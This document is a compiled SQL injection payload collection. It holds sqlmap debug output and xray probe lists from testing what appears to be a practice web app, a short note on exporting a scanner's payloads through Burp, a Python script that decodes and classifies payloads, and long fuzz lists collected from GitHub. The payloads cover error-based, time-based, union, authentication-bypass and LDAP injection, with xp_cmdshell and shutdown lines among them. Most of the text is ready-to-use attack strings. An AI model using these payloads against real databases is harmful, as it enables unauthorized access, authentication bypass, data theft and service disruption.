[10:59:30] [PAYLOAD] 1212'))) AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((('xIKJ'='xIKJ
[10:59:30] [PAYLOAD] 1212' AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'InVU'='InVU
[10:59:30] [PAYLOAD] 1212' AND (SELECT 6020 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT REPEAT(0x34,1024)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JJVD'='JJVD
[10:59:30] [PAYLOAD] 1212' AND (SELECT 6431 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT REPEAT(0x32,512)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aDyQ'='aDyQ
[10:59:30] [PAYLOAD] 1212' AND (SELECT 5035 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT REPEAT(0x36,256)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'YXYL'='YXYL
[10:59:30] [PAYLOAD] 1212' AND (SELECT 7694 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT REPEAT(0x34,54)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'eYaj'='eYaj
[10:59:30] [PAYLOAD] 1212' AND (SELECT 6585 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'SRBj'='SRBj
[10:59:30] [PAYLOAD] 1212' AND (SELECT 2193 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bvJk'='bvJk
[10:59:30] [DEBUG] performed 1 query in 0.02 seconds
[10:59:30] [PAYLOAD] 1212' AND (SELECT 3698 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'dSWI'='dSWI
[10:59:30] [DEBUG] performed 1 query in 0.02 seconds
[10:59:30] [PAYLOAD] 1212' AND (SELECT 7684 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zwww'='zwww
[10:59:30] [DEBUG] performed 1 query in 0.02 seconds
[10:59:30] [PAYLOAD] 1212' AND (SELECT 5906 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Flmd'='Flmd
MySQL time-based blind injection
[11:05:45] [PAYLOAD] vince(,,()'.)"(
[11:05:46] [PAYLOAD] vince'gIqUuu<'">PmVDNY

[11:05:46] [PAYLOAD] vince) AND (SELECT 9308 FROM (SELECT(SLEEP(5)))egTe) AND (6129=6129
[11:05:48] [PAYLOAD] vince AND (SELECT 9308 FROM (SELECT(SLEEP(5)))egTe)
[11:05:48] [PAYLOAD] vince') AND (SELECT 9308 FROM (SELECT(SLEEP(5)))egTe) AND ('XPmd'='XPmd
[11:05:48] [PAYLOAD] vince' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))egTe) AND 'KAzh'='KAzh
[11:05:53] [PAYLOAD] vince' AND (SELECT 9308 FROM (SELECT(SLEEP(0)))egTe) AND 'KAzh'='KAzh
[11:05:53] [PAYLOAD] vince' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))egTe) AND 'KAzh'='KAzh
[11:05:58] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable

[11:05:58] [PAYLOAD] vince' AND (SELECT 6538 FROM (SELECT(SLEEP(5-(IF(36=36,0,5)))))LMTQ) AND 'icVh'='icVh
[11:06:03] [PAYLOAD] vince' AND (SELECT 8785 FROM (SELECT(SLEEP(5-(IF(36=69,0,5)))))SLGE) AND 'wNtS'='wNtS
[11:06:03] [PAYLOAD] vince' AND (SELECT 7899 FROM (SELECT(SLEEP(5-(IF(36=94,0,5)))))gfut) AND 'PEZQ'='PEZQ
[11:06:03] [PAYLOAD] vince' AND (SELECT 3177 FROM (SELECT(SLEEP(5-(IF(94=69,0,5)))))MYYC) AND 'EVvY'='EVvY
[11:06:03] [PAYLOAD] vince' AND (SELECT 4143 FROM (SELECT(SLEEP(5-(IF(69=69,0,5)))))UydH) AND 'ROmt'='ROmt
[11:06:08] [PAYLOAD] vince' AND (SELECT 7451 FROM (SELECT(SLEEP(5-(IF(94 69,0,5)))))NCXY) AND 'jLaU'='jLaU
[11:06:08] [DEBUG] checking for parameter length constraining mechanisms
[11:06:08] [PAYLOAD] vince' AND (SELECT 5146 FROM (SELECT(SLEEP(5-(IF(8047=   

[11:06:13] [PAYLOAD] vince' AND (SELECT 7552 FROM (SELECT(SLEEP(5-(IF(2554>2553,0,5)))))YWab) AND 'LuVp'='LuVp

[11:06:18] [PAYLOAD] vince' AND (SELECT 5150 FROM (SELECT(SLEEP(5-(IF(VERSION() LIKE 0x254d61726961444225,0,5)))))wfVL) AND 'aYWP'='aYWP
[11:06:18] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[11:06:18] [PAYLOAD] vince' AND (SELECT 1675 FROM (SELECT(SLEEP(5-(IF(VERSION() LIKE 0x255469444225,0,5)))))BvcY) AND 'cvMR'='cvMR
[11:06:18] [PAYLOAD] vince' AND (SELECT 2382 FROM (SELECT(SLEEP(5-(IF(@@VERSION_COMMENT LIKE 0x256472697a7a6c6525,0,5)))))zSvS) AND 'hBBm'='hBBm
[11:06:18] [PAYLOAD] vince' AND (SELECT 9913 FROM (SELECT(SLEEP(5-(IF(@@VERSION_COMMENT LIKE 0x25506572636f6e6125,0,5)))))hHGN) AND 'FjRb'='FjRb
[11:06:18] [PAYLOAD] vince' AND (SELECT 2776 FROM (SELECT(SLEEP(5-(IF(AURORA_VERSION() LIKE 0x25,0,5)))))yPUm) AND 'Obkk'='Obkk

xray

Character type
vince'and/**/extractvalue(1,concat(char(126),md5(1488521800)))and'
vince'and'b'='b
vince'and'y'='t
vince"and"z"="z
vince"and"z"="u
vince'and(select*from(select+sleep(0))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(2))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='
Numeric type
id=1&submit=查询'and'p'='p
id=1'and/**/extractvalue(1,concat(char(126),md5(1181317772)))and'&submit=查询
id=1&submit=查询'and'g'='l
id=1"and/**/extractvalue(1,concat(char(126),md5(1217404665)))and"&submit=查询
id=1&submit=查询"and"o"="o
id=extractvalue(1,concat(char(126),md5(1660084292)))&submit=查询
id=1&submit=查询"and"b"="e
id=1&submit=查询'and/**/extractvalue(1,concat(char(126),md5(1755264351)))and'
id=1&submit=查询"and/**/extractvalue(1,concat(char(126),md5(1665280176)))and"
id=1&submit=extractvalue(1,concat(char(126),md5(1897629256)))
id=1&submit=查询'and(select'1'from/**/cast(md5(1676192137)as/**/int))>'0
id=1&submit=查询/**/and/**/cast(md5('1674634432')as/**/int)>0
id=1&submit=convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1523921760')))
id=1&submit=查询'and(select*from(select+sleep(0))a/**/union/**/select+1)='
id=1&submit=查询'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1405899186')))>'0
id=1&submit=查询'and(select*from(select+sleep(2))a/**/union/**/select+1)='
id=1&submit=查询鎈'"\(
id=1&submit=查询"and(select*from(select+sleep(0))a/**/union/**/select+1)="
id=1&submit=查询'"\(
id=1&submit=查询"and(select*from(select+sleep(2))a/**/union/**/select+1)="
id=1&submit=查询'/**/and(select'1'from/**/pg_sleep(0))::text>'0
id=1&submit=查询'/**/and(select'1'from/**/pg_sleep(2))::text>'0
id=1&submit=查询'and(select+1)>0waitfor/**/delay'0:0:0
id=1&submit=查询'and(select+1)>0waitfor/**/delay'0:0:2
id=1&submit=查询'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s
id=1&submit=查询'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('o',2)='o
id=1/**/and+3=3&submit=查询
id=1/**/and+0=6&submit=查询
id=1'and't'='t&submit=查询
id=1'and'f'='o&submit=查询
id=1"and"g"="g&submit=查询
id=1"and"u"="i&submit=查询
id=(select*from(select+sleep(0)union/**/select+1)a)&submit=查询
id=(select*from(select+sleep(2)union/**/select+1)a)&submit=查询
id=(select*from(select+sleep(3)union/**/select+1)a)&submit=查询
id=(select*from(select+sleep(3)union/**/select+1)a)&submit=查询
id=(select*from(select+sleep(3)union/**/select+1)a)&submit=查询
Search type
vince'and/**/extractvalue(1,concat(char(126),md5(1626960232)))and'
vince'and'g'='g
vince'and'o'='l
vince"and"q"="q
vince"and"h"="x
vince'and(select*from(select+sleep(0))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(2))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='
vince'and(select*from(select+sleep(3))a/**/union/**/select+1)='&submit
Error-based
'and/**/extractvalue(1,concat(char(126),md5(1776632033)))and'
and(select*from(select+sleep(0))a/**/union/**/select+1)
'and(select*from(select+sleep(2))a/**/union/**/select+1)
'and(select*from(select+sleep(3))a/**/union/**/select+1)
'and(select*from(select+sleep(3))a/**/union/**/select+1)
'and(select*from(select+sleep(3))a/**/union/**/select+1)
add=&email='and/**/extractvalue(1,concat(char(126),md5(1194503700)))and'&password=123123&phonenum=&sex=&submit=submit&username=
add=&email=&password=123123&phonenum=&sex=and""z"""
extractvalue(1,concat(char(126),md5(1760117950)))&username
submit'and(select'1'from/**/cast(md5(1744730361)as/**/int))>'0&username
submit/**/and/**/cast(md5('1907172907')as/**/int)>0&username
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1108003637')))&username
submit'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1599639292')))>'0&username
'and/**/extractvalue(1,concat(char(126),md5(1463295133)))and'
Error-based
56'and/**/extractvalue(1,concat(char(126),md5(1045862347)))and'
56/**/and+2=2
56"and/**/extractvalue(1,concat(char(126),md5(1310092426)))and"
56/**/and+0=9
extractvalue(1,concat(char(126),md5(1030526389)))
56'and'i'='i
56'and'g'='y
56"and"l"="l
56"and"n"="f
(select*from(select+sleep(0)union/**/select+1)a)
(select*from(select+sleep(5)union/**/select+1)a)
(select*from(select+sleep(6)union/**/select+1)a)
(select*from(select+sleep(6)union/**/select+1)a)
(select*from(select+sleep(6)union/**/select+1)a)

awvs

Because AWVS ran into a problem and its activation expired, it cannot be used for now.

Here is the idea anyway: proxy AWVS's traffic through Burp and run the scan; Burp records every packet along the way. Install the Logger++ plugin, which can export Burp's traffic in a customizable way, so the payloads can be exported directly. Put them into Excel and use the split-column feature to pull out the payloads. Then, if anything is encoded, decode it directly with a decoding tool.
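The collection step just described (export the proxied scanner traffic, split out the payloads, decode them), done in code instead of Excel, and extended to sort the decoded payloads into the technique families that appear in the sqlmap and xray output above. This is an added example, not code from the original page or from Burp/Logger++; the CSV column names, the paths and the sample rows are constructed.

```python
"""Pull SQL injection payloads out of a proxy traffic export, decode them and
sort them by technique.  Added example; the CSV layout is assumed."""
import csv
import io
import re
from urllib.parse import parse_qsl

# Constructed sample of a Logger++-style export (hypothetical columns and
# paths).  Query strings are URL-encoded as the scanner would have sent them.
SAMPLE_CSV = """\
Tool,Method,Path,Query
Scanner,GET,/search.php,name=vince%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281488521800%29%29%29and%27&submit=%E6%9F%A5%E8%AF%A2
Scanner,GET,/query.php,id=1&submit=%E6%9F%A5%E8%AF%A2%27and%28select%2Afrom%28select+sleep%282%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+1%29%3D%27
Scanner,GET,/query.php,id=1&submit=%E6%9F%A5%E8%AF%A2%27%2F%2A%2A%2Fand%28select%271%27from%2F%2A%2A%2Fpg_sleep%282%29%29%3A%3Atext%3E%270
Scanner,GET,/query.php,id=1&submit=%E6%9F%A5%E8%AF%A2%27and%28select+1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A2
Scanner,GET,/query.php,id=1%27and%27t%27%3D%27t&submit=%E6%9F%A5%E8%AF%A2
Proxy,GET,/search.php,name=vince&submit=%E6%9F%A5%E8%AF%A2
Scanner,GET,/search.php,name=1212%27+AND+GTID_SUBSET%28CONCAT%280x7162707a71%2C%28SELECT+%28ELT%281467%3D1467%2C1%29%29%29%2C0x7176627071%29%2C1467%29+AND+%27dGSK%27%3D%27dGSK
"""

# (family, pattern) in priority order: the first pattern that matches the
# comment-stripped value decides the family.  The families mirror the payload
# shapes listed above (sqlmap, xray and the fuzz list).  The generic
# tautology pattern comes last because sqlmap appends "AND 'x'='x" trailers
# to every technique, and it can also fire on benign text like "sort=a or b".
SIGNATURES = [(family, re.compile(p, re.IGNORECASE)) for family, p in [
    ("error-based (MySQL extractvalue)", r"extractvalue\s*\("),
    ("error-based (MySQL GTID_SUBSET)", r"gtid_subset\s*\("),
    ("error-based (MySQL JSON_KEYS)", r"json_keys\s*\("),
    ("error-based (MySQL FLOOR/RAND)", r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2"),
    ("error-based (MSSQL HashBytes convert)", r"hashbytes\s*\("),
    ("error-based (PostgreSQL cast md5)", r"cast\s*\(\s*md5\s*\("),
    ("time-based (PostgreSQL pg_sleep)", r"pg_sleep\s*\("),
    ("time-based (MySQL SLEEP)", r"\bsleep\s*\("),
    ("time-based (MSSQL WAITFOR DELAY)", r"waitfor\s+delay"),
    ("time-based (Oracle DBMS_PIPE)", r"dbms_pipe\.receive_message"),
    ("boolean-based (tautology)", r"\b(?:and|or)\b\s*[\"'`]?\w+[\"'`]?\s*=\s*[\"'`]?\w+"),
]]

COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def classify(value):
    """Return the payload family of a decoded parameter value, or None.
    Inline comments such as /**/ (used to dodge keyword filters) are replaced
    by a space first, so 'and/**/extractvalue' is seen as 'and extractvalue'."""
    normalized = COMMENT.sub(" ", value)
    for family, pattern in SIGNATURES:
        if pattern.search(normalized):
            return family
    return None


def decode_query(query):
    """Split a raw query string into decoded (name, value) pairs.  parse_qsl
    does the URL decoding ('+' becomes a space), which covers both the Excel
    split-column step and the separate decoding tool from the text."""
    return parse_qsl(query, keep_blank_values=True)


def extract_payloads(csv_text):
    """Walk a CSV export and return one record per parameter that carries a
    recognised payload: path, parameter name, decoded payload and family."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        for name, value in decode_query(row["Query"]):
            family = classify(value)
            if family:
                findings.append({"path": row["Path"], "param": name,
                                 "payload": value, "family": family})
    return findings


if __name__ == "__main__":
    for f in extract_payloads(SAMPLE_CSV):
        print(f"{f['family']:<38} {f['path']} [{f['param']}] {f['payload']}")
```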


Collected from GitHub

fuzz

"or "a"="a
')or('a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 1=1
'OR 1=1
"or 1=1
'xor
'or 1=1/*
1'or'1'='1
'
a' or 1=1--
"a"" or 1=1--"
 or a = a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
a'
?
' or 1=1
ý or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
anything' OR 'x'='x
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND members.email IS NULL; --
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
 or 0=0 #"
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
' or 1 --'
or%201=1
or%201=1 --
' or 1=1 or ''='
 or 1=1 or ""=
' or a=a--
 or a=a
') or ('a'='a
) or (a=a
hi or a=a
hi or 1=1 --"
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
"hi"") or (""a""=""a"
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
&apos;%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
a' or 3=3--
"a"" or 3=3--"
' or 3=3
ý or 3=3 --
"
#
-
--
' --
--';
' ;
= '
= ;
= --
\x23
\x27
\x3D \x3B'
\x3D \x27
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
';shutdown--
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 0=0 #
"' or 1 --'"
" or 1=1 or ""="
" or "a"="a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi") or ("a"="a
&lt;&gt;&quot;'%;)(&amp;+
' and '' like '
' AnD '' like '
' or '' like '
' and '' like '%
' aND '' like '%
' and '' like ''--
' and 2>1--
' and 2>3--
') and ('x'='x
) and (1=1
¡® or 1=1 --
¡® or 3=3 --

Generic SQL Injection Payloads

'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or # 
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
 OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/ 
+		addition, concatenate (or space in url)
||		(double pipe) concatenate
%		wildcard attribute indicator

@variable	local variable
@@variable	global variable


# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2


1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+

1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --


-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --


-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1	

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --


Finding the table name


Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--

Comments:

#	    Hash comment
/*  	C-style comment
-- -	SQL comment
;%00	Nullbyte
`	    Backtick

Generic Error Based Payloads

 OR 1=1
 OR 1=0
 OR x=x
 OR x=y
 OR 1=1#
 OR 1=0#
 OR x=x#
 OR x=y#
 OR 1=1-- 
 OR 1=0-- 
 OR x=x-- 
 OR x=y-- 
 OR 3409=3409 AND ('pytW' LIKE 'pytW
 OR 3409=3409 AND ('pytW' LIKE 'pytY
 HAVING 1=1
 HAVING 1=0
 HAVING 1=1#
 HAVING 1=0#
 HAVING 1=1-- 
 HAVING 1=0-- 
 AND 1=1
 AND 1=0
 AND 1=1-- 
 AND 1=0-- 
 AND 1=1#
 AND 1=0#
 AND 1=1 AND '%'='
 AND 1=0 AND '%'='
 AND 1083=1083 AND (1427=1427
 AND 7506=9091 AND (5913=5913
 AND 1083=1083 AND ('1427=1427
 AND 7506=9091 AND ('5913=5913
 AND 7300=7300 AND 'pKlZ'='pKlZ
 AND 7300=7300 AND 'pKlZ'='pKlY
 AND 7300=7300 AND ('pKlZ'='pKlZ
 AND 7300=7300 AND ('pKlZ'='pKlY
 AS INJECTX WHERE 1=1 AND 1=1
 AS INJECTX WHERE 1=1 AND 1=0
 AS INJECTX WHERE 1=1 AND 1=1#
 AS INJECTX WHERE 1=1 AND 1=0#
 AS INJECTX WHERE 1=1 AND 1=1--
 AS INJECTX WHERE 1=1 AND 1=0--
 WHERE 1=1 AND 1=1
 WHERE 1=1 AND 1=0
 WHERE 1=1 AND 1=1#
 WHERE 1=1 AND 1=0#
 WHERE 1=1 AND 1=1--
 WHERE 1=1 AND 1=0--
 ORDER BY 1-- 
 ORDER BY 2-- 
 ORDER BY 3-- 
 ORDER BY 4-- 
 ORDER BY 5-- 
 ORDER BY 6-- 
 ORDER BY 7-- 
 ORDER BY 8-- 
 ORDER BY 9-- 
 ORDER BY 10-- 
 ORDER BY 11-- 
 ORDER BY 12-- 
 ORDER BY 13-- 
 ORDER BY 14-- 
 ORDER BY 15-- 
 ORDER BY 16-- 
 ORDER BY 17-- 
 ORDER BY 18-- 
 ORDER BY 19-- 
 ORDER BY 20-- 
 ORDER BY 21-- 
 ORDER BY 22-- 
 ORDER BY 23-- 
 ORDER BY 24-- 
 ORDER BY 25-- 
 ORDER BY 26-- 
 ORDER BY 27-- 
 ORDER BY 28-- 
 ORDER BY 29-- 
 ORDER BY 30-- 
 ORDER BY 31337-- 
 ORDER BY 1# 
 ORDER BY 2# 
 ORDER BY 3# 
 ORDER BY 4# 
 ORDER BY 5# 
 ORDER BY 6# 
 ORDER BY 7# 
 ORDER BY 8# 
 ORDER BY 9# 
 ORDER BY 10# 
 ORDER BY 11# 
 ORDER BY 12# 
 ORDER BY 13# 
 ORDER BY 14# 
 ORDER BY 15# 
 ORDER BY 16# 
 ORDER BY 17# 
 ORDER BY 18# 
 ORDER BY 19# 
 ORDER BY 20# 
 ORDER BY 21# 
 ORDER BY 22# 
 ORDER BY 23# 
 ORDER BY 24# 
 ORDER BY 25# 
 ORDER BY 26# 
 ORDER BY 27# 
 ORDER BY 28# 
 ORDER BY 29# 
 ORDER BY 30#
 ORDER BY 31337#
 ORDER BY 1 
 ORDER BY 2 
 ORDER BY 3 
 ORDER BY 4 
 ORDER BY 5 
 ORDER BY 6 
 ORDER BY 7 
 ORDER BY 8 
 ORDER BY 9 
 ORDER BY 10 
 ORDER BY 11 
 ORDER BY 12 
 ORDER BY 13 
 ORDER BY 14 
 ORDER BY 15 
 ORDER BY 16 
 ORDER BY 17 
 ORDER BY 18 
 ORDER BY 19 
 ORDER BY 20 
 ORDER BY 21 
 ORDER BY 22 
 ORDER BY 23 
 ORDER BY 24 
 ORDER BY 25 
 ORDER BY 26 
 ORDER BY 27 
 ORDER BY 28 
 ORDER BY 29 
 ORDER BY 30 
 ORDER BY 31337 
 RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
 RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
 and (select substring(@@version,1,1))='X'
 and (select substring(@@version,1,1))='M'
 and (select substring(@@version,2,1))='i'
 and (select substring(@@version,2,1))='y'
 and (select substring(@@version,3,1))='c'
 and (select substring(@@version,3,1))='S'
 and (select substring(@@version,3,1))='X'

Generic Time Based SQL Injection Payloads

# from wapiti
sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/

SQL Injection Auth Bypass Payloads

'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
